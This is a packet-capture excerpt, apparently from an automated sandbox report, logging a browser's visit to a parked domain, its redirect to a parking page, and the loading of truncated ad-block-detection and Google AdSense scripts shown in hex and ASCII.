                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Referer: http://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Aug 29, 2024 17:12:15.045474052 CEST259INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Thu, 29 Aug 2024 15:12:14 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 114
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                          Aug 29, 2024 17:12:18.415252924 CEST531OUTGET / HTTP/1.1
                                                                          Host: www.onefordvd.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: expiry_partner=; caf_ipaddr=8.46.123.33; country=US; city=New%20York; lander_type=parking
                                                                          Aug 29, 2024 17:12:18.520024061 CEST259INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 114
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                          Aug 29, 2024 17:13:03.526462078 CEST6OUTData Raw: 00
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.54970815.197.204.56804040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Aug 29, 2024 17:12:59.275988102 CEST6OUTData Raw: 00
                                                                          Data Ascii:


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.54971215.197.204.564434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:15 UTC688OUTGET /lander HTTP/1.1
                                                                          Host: www.onefordvd.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Referer: http://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:15 UTC708INHTTP/1.1 200 OK
                                                                          Cache-Control: private, max-age=86400
                                                                          Content-Type: text/html
                                                                          Date: Thu, 29 Aug 2024 15:12:15 GMT
                                                                          Server: openresty
                                                                          Set-Cookie: expiry_partner=; Path=/; Max-Age=86400
                                                                          Set-Cookie: caf_ipaddr=8.46.123.33; Path=/; Max-Age=86400
                                                                          Set-Cookie: country=US; Path=/; Max-Age=86400
                                                                          Set-Cookie: city=New%20York; Path=/; Max-Age=86400
                                                                          Set-Cookie: lander_type=parking; Path=/; Max-Age=86400
                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_FyGotyW0cZLGGa4j4IB7tAwNAvGOAB+crxhyTip6ZxtQAY6DNNIMZuWdgtTLOfD8TH3eL59kXiXe/Xx2JUqkKw
                                                                          X-Content-Type-Options: nosniff
                                                                          Content-Length: 620
                                                                          Connection: close
                                                                          2024-08-29 15:12:15 UTC478INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 26 67 64 61 62 70 3d 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73
                                                                          Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true"></script><script s
                                                                          2024-08-29 15:12:15 UTC142INData Raw: 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 6d 61 69 6e 2e 65 66 39 30 61 36 32 37 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: k href="https://img1.wsimg.com/parking-lander/static/css/main.ef90a627.css" rel="stylesheet"></head><body><div id="root"></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.553744172.67.41.604434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:16 UTC546OUTGET /tag?o=5097926782615552&upapi=true HTTP/1.1
                                                                          Host: btloader.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:16 UTC444INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:16 GMT
                                                                          Content-Type: application/javascript
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=300, must-revalidate, stale-if-error=3600, stale-while-revalidate=300
                                                                          Etag: W/"797aa17e982f10a873a7f98bd2d4edb9"
                                                                          Last-Modified: Thu, 29 Aug 2024 15:09:35 GMT
                                                                          Vary: Origin
                                                                          Via: 1.1 google
                                                                          CF-Cache-Status: HIT
                                                                          Age: 8
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a760aa9c341-EWR
                                                                          2024-08-29 15:12:16 UTC925INData Raw: 37 64 65 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 73 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 73 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 72 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 72 29 26 26 28 65 5b 72 5d 3d 74 5b 72 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 74 28 65
                                                                          Data Ascii: 7de4!function(){"use strict";var e=function(){return e=Object.assign||function(e){for(var t,n=1,s=arguments.length;n<s;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e},e.apply(this,arguments)};function t(e
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 7c 28 28 72 3d 73 2e 72 65 74 75 72 6e 29 26 26 72 2e 63 61 6c 6c 28 73 29 2c 30 29 3a 73 2e 6e 65 78 74 29 26 26 21 28 72 3d 72 2e 63 61 6c 6c 28 73 2c 69 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 72 3b 73 77 69 74 63 68 28 73 3d 30 2c 72 26 26 28 69 3d 5b 32 26 69 5b 30 5d 2c 72 2e 76 61 6c 75 65 5d 29 2c 69 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 72 3d 69 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 6f 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 69 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 6f 2e 6c 61 62 65 6c 2b 2b 2c 73 3d 69 5b 31 5d 2c 69 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 69 3d 6f 2e 6f 70 73 2e 70 6f 70 28 29 2c 6f 2e 74 72 79 73 2e 70 6f 70 28 29 3b
                                                                          Data Ascii: |((r=s.return)&&r.call(s),0):s.next)&&!(r=r.call(s,i[1])).done)return r;switch(s=0,r&&(i=[2&i[0],r.value]),i[0]){case 0:case 1:r=i;break;case 4:return o.label++,{value:i[1],done:!1};case 5:o.label++,s=i[1],i=[0];continue;case 7:i=o.ops.pop(),o.trys.pop();
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 69 2c 61 2c 63 3b 72 65 74 75 72 6e 20 6e 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 6e 2e 74 72 79 73 2e 70 75 73 68 28 5b 30 2c 33 2c 2c 34 5d 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 3d 77 69 6e 64 6f 77 2e 5f 5f 62 74 7c 7c 7b 7d 2c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 5f 5f 62 74 2e 63 75 73 74 6f 6d 44 65 74 65 63 74 41 64 42 6c 6f 63 6b 3f 5b 33 2c 32 5d 3a 5b 34 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 2e 63 75 73 74 6f 6d 44 65 74 65 63 74 41 64 42 6c 6f 63 6b 28 29 5d 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 5b 32 2c 6e 2e 73 65 6e 74 28
                                                                          Data Ascii: d 0,(function(){var e,t,i,a,c;return n(this,(function(n){switch(n.label){case 0:return n.trys.push([0,3,,4]),window.__bt=window.__bt||{},"function"!=typeof window.__bt.customDetectAdBlock?[3,2]:[4,window.__bt.customDetectAdBlock()];case 1:return[2,n.sent(
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 28 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 76 61 72 20 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 3b 74 72 79 7b 69 66 28 74 6f 70 2e 64 6f 63 75 6d 65 6e 74 29 72 65 74 75 72 6e 20 74 6f 70 7d 63 61 74 63 68 28 65 29 7b 7d 74 72 79 7b 66 6f 72 28 3b 65 2e 70 61 72 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 3b 29 65 3d 65 2e 70 61 72 65 6e 74 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 65 7d 28 29 3b 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 22 22 21 3d 3d 64 6f 63
                                                                          Data Ascii: ))}function l(e){(window.document.body||window.document.documentElement).removeChild(e)}var u=function(){var e=window;try{if(top.document)return top}catch(e){}try{for(;e.parent.document;)e=e.parent}catch(e){}return e}();var d=function(){try{return""!==doc
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 22 22 2c 20 22 76 69 65 77 22 3a 22 22 2c 20 22 73 69 6e 67 6c 65 5f 63 6c 69 63 6b 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 20 22 70 61 67 65 5f 76 69 65 77 73 5f 74 6f 5f 72 65 6e 64 65 72 22 3a 22 30 22 2c 20 22 70 72 65 6d 69 75 6d 5f 62 79 70 61 73 73 5f 6d 6f 64 65 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 20 22 68 61 72 64 5f 6d 65 73 73 61 67 65 5f 77 61 6c 6c 5f 6d 6f 64 65 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 20 22 61 6c 6c 6f 77 5f 72 65 6e 64 65 72 5f 74 6f 5f 61 61 5f 75 73 65 72 73 22 3a 66 61 6c 73 65 2c 20 22 63 74 61 5f 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 22 3a 22 22 2c 20 22 66 6f 6e 74 5f 74 79 70 65 22 3a 22 22 2c 20 22 72 65 6e 64 65 72 5f 69 6e 74 65 72 76 61 6c 5f 64 61 79 73 22 3a 30 2c 20 22 63 6f 75 6e 74
                                                                          Data Ascii: "", "view":"", "single_click_enabled":false, "page_views_to_render":"0", "premium_bypass_mode_enabled":false, "hard_message_wall_mode_enabled":false, "allow_render_to_aa_users":false, "cta_button_color":"", "font_type":"", "render_interval_days":0, "count
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 6c 73 65 2c 22 6d 65 22 3a 66 61 6c 73 65 2c 22 77 22 3a 22 35 30 39 35 30 32 37 32 31 30 37 31 35 31 33 36 22 2c 22 77 69 64 67 65 74 22 3a 66 61 6c 73 65 2c 22 61 22 3a 66 61 6c 73 65 7d 2c 22 64 6f 67 6c 69 6e 6b 73 2e 63 6f 6d 22 3a 7b 22 63 65 22 3a 66 61 6c 73 65 2c 22 6d 65 22 3a 66 61 6c 73 65 2c 22 77 22 3a 22 35 32 30 34 38 36 31 31 33 34 33 30 37 33 32 38 22 2c 22 77 69 64 67 65 74 22 3a 66 61 6c 73 65 2c 22 61 22 3a 66 61 6c 73 65 7d 2c 22 66 6f 6f 74 62 61 6c 6c 74 69 63 6b 65 74 2e 6e 65 74 22 3a 7b 22 63 65 22 3a 66 61 6c 73 65 2c 22 6d 65 22 3a 66 61 6c 73 65 2c 22 77 22 3a 22 35 31 38 38 36 39 33 36 32 37 35 30 32 35 39 32 22 2c 22 77 69 64 67 65 74 22 3a 66 61 6c 73 65 2c 22 61 22 3a 66 61 6c 73 65 7d 2c 22 6e 79 65 64 61 2e 63 6f 6d 22
                                                                          Data Ascii: lse,"me":false,"w":"5095027210715136","widget":false,"a":false},"doglinks.com":{"ce":false,"me":false,"w":"5204861134307328","widget":false,"a":false},"footballticket.net":{"ce":false,"me":false,"w":"5188693627502592","widget":false,"a":false},"nyeda.com"
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 69 64 22 2c 44 29 29 3b 76 61 72 20 54 3d 7b 74 72 61 63 65 49 44 3a 52 2c 73 65 73 73 69 6f 6e 49 44 3a 44 7d 3b 76 61 72 20 56 2c 50 2c 6b 2c 78 2c 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 73 2c 72 2c 69 2c 6f 2c 61 2c 63 2c 6c 2c 64 3b 72 65 74 75 72 6e 20 74 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 70 2c 67 2c 76 2c 6d 2c 66 2c 77 2c 43 2c 4c 2c 52 2c 44 2c 56 2c 50 2c 6b 2c 78 3b 72 65 74 75 72 6e 20 6e 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 69 66 28 74 3d 7b 77 65 62 73 69 74 65 49 44 3a 76 6f 69 64 20 30 2c 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3a 21 31 2c 6d 6f 62 69 6c
                                                                          Data Ascii: id",D));var T={traceID:R,sessionID:D};var V,P,k,x,N=function(){var e,s,r,i,o,a,c,l,d;return t(this,void 0,void 0,(function(){var t,p,g,v,m,f,w,C,L,R,D,V,P,k,x;return n(this,(function(n){switch(n.label){case 0:if(t={websiteID:void 0,contentEnabled:!1,mobil
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 3d 77 2e 74 61 67 44 61 74 61 2e 77 69 64 67 65 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 26 26 65 2c 5b 32 2c 7b 73 69 74 65 49 6e 66 6f 3a 74 2c 62 75 6e 64 6c 65 44 61 74 61 3a 77 2e 62 75 6e 64 6c 65 44 61 74 61 2c 72 6c 53 65 74 74 69 6e 67 73 3a 77 2e 6d 65 73 73 61 67 65 57 61 6c 6c 2c 63 68 65 63 6b 73 75 6d 3a 77 2e 63 68 65 63 6b 73 75 6d 7d 5d 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 6e 2e 73 65 6e 74 28 29 2c 5b 33 2c 35 5d 3b 63 61 73 65 20 35 3a 69 66 28 67 26 26 67 20 69 6e 20 41 29 4c 3d 41 5b 67 5d 2c 74 2e 77 65 62 73 69 74 65 49 44 3d 6e 75 6c 6c 21 3d 3d 28 73 3d 4c 2e 77 29 26 26 76 6f 69 64 20 30 21 3d 3d 73 3f 73 3a 4c 2e 77 65 62 73 69 74 65 5f 69 64 2c 74 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6e 75 6c 6c 21 3d 3d 28
                                                                          Data Ascii: =w.tagData.widget)&&void 0!==e&&e,[2,{siteInfo:t,bundleData:w.bundleData,rlSettings:w.messageWall,checksum:w.checksum}];case 4:return n.sent(),[3,5];case 5:if(g&&g in A)L=A[g],t.websiteID=null!==(s=L.w)&&void 0!==s?s:L.website_id,t.contentEnabled=null!==(
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 6f 6e 28 29 7b 6e 28 72 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 7d 2c 72 2e 73 65 6e 64 28 74 29 7d 29 29 7d 28 22 68 74 74 70 73 3a 2f 2f 22 2b 53 2b 22 2f 65 76 65 6e 74 73 2f 75 6e 6b 6e 6f 77 6e 5f 64 6f 6d 61 69 6e 73 3f 75 70 61 70 69 3d 74 72 75 65 26 74 69 64 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 54 2e 74 72 61 63 65 49 44 29 2b 22 26 63 76 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 49 29 2c 56 29 7d 72 65 74 75 72 6e 5b 32 2c 7b 73 69 74 65 49 6e 66 6f 3a 74 7d 5d 7d 7d 29 29 7d 29 29 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 4e 7d 4e 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a
                                                                          Data Ascii: on(){n(r.responseText)},r.send(t)}))}("https://"+S+"/events/unknown_domains?upapi=true&tid="+encodeURIComponent(T.traceID)+"&cv="+encodeURIComponent(I),V)}return[2,{siteInfo:t}]}}))}))}();function U(){return N}N.then((function(e){window.__bt_tag_d={orgID:
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 22 2c 36 31 5d 2c 5b 22 2d 22 2c 36 32 5d 2c 5b 22 5f 22 2c 36 33 5d 5d 29 3b 73 74 61 74 69 63 20 42 41 53 49 53 3d 36 3b 73 74 61 74 69 63 20 4c 43 4d 3d 32 34 3b 73 74 61 74 69 63 20 65 6e 63 6f 64 65 28 65 29 7b 69 66 28 21 2f 5e 5b 30 2d 31 5d 2b 24 2f 2e 74 65 73 74 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 4d 28 22 49 6e 76 61 6c 69 64 20 62 69 74 46 69 65 6c 64 22 29 3b 63 6f 6e 73 74 20 74 3d 65 2e 6c 65 6e 67 74 68 25 74 68 69 73 2e 4c 43 4d 3b 65 2b 3d 74 3f 22 30 22 2e 72 65 70 65 61 74 28 74 68 69 73 2e 4c 43 4d 2d 74 29 3a 22 22 3b 6c 65 74 20 6e 3d 22 22 3b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 3d 74 68 69 73 2e 42 41 53 49 53 29 6e 2b 3d 74 68 69 73 2e 44 49 43 54 5b 70 61 72 73 65 49 6e 74 28 65 2e 73
                                                                          Data Ascii: ",61],["-",62],["_",63]]);static BASIS=6;static LCM=24;static encode(e){if(!/^[0-1]+$/.test(e))throw new M("Invalid bitField");const t=e.length%this.LCM;e+=t?"0".repeat(this.LCM-t):"";let n="";for(let t=0;t<e.length;t+=this.BASIS)n+=this.DICT[parseInt(e.s


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.553743142.250.186.684434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:16 UTC651OUTGET /adsense/domains/caf.js?abp=1&gdabp=true HTTP/1.1
                                                                          Host: www.google.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:16 UTC844INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/ads-afs-ui
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="ads-afs-ui"
                                                                          Report-To: {"group":"ads-afs-ui","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-afs-ui"}]}
                                                                          Content-Length: 153696
                                                                          Date: Thu, 29 Aug 2024 15:12:16 GMT
                                                                          Expires: Thu, 29 Aug 2024 15:12:16 GMT
                                                                          Cache-Control: private, max-age=3600
                                                                          ETag: "9010774428184917835"
                                                                          X-Content-Type-Options: nosniff
                                                                          Link: <https://syndicatedsearch.goog>; rel="preconnect"
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:16 UTC546INData Raw: 69 66 28 21 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 29 7b 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 3d 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 41 6c 74 4c 6f 61 64 65 72 3d 33 3b 76 61 72 20 73 66 66 65 44 61 74 61 5f 3d 7b 73 65 72 76 69 63 65 5f 68 6f 73 74 3a 22 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 68 61 73 68 3a 22 31 32 30 30 30 38 36 37 35 38 31 34 38 36 32 32 33 32 35 35 22 2c 70 61 63 6b 61 67 65 73 3a 22 64 6f 6d 61 69 6e 73 22 2c 6d 6f 64 75 6c 65 3a 22 61 64 73 22 2c 76 65 72 73 69 6f 6e 3a 22 31 22 2c 6d 3a 7b 63 65 69 3a 22 31 37 33 30 31 34 33 31 2c 31 37 33 30 31 34 33 33 2c 31 37 33
                                                                          Data Ascii: if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17301431,17301433,173
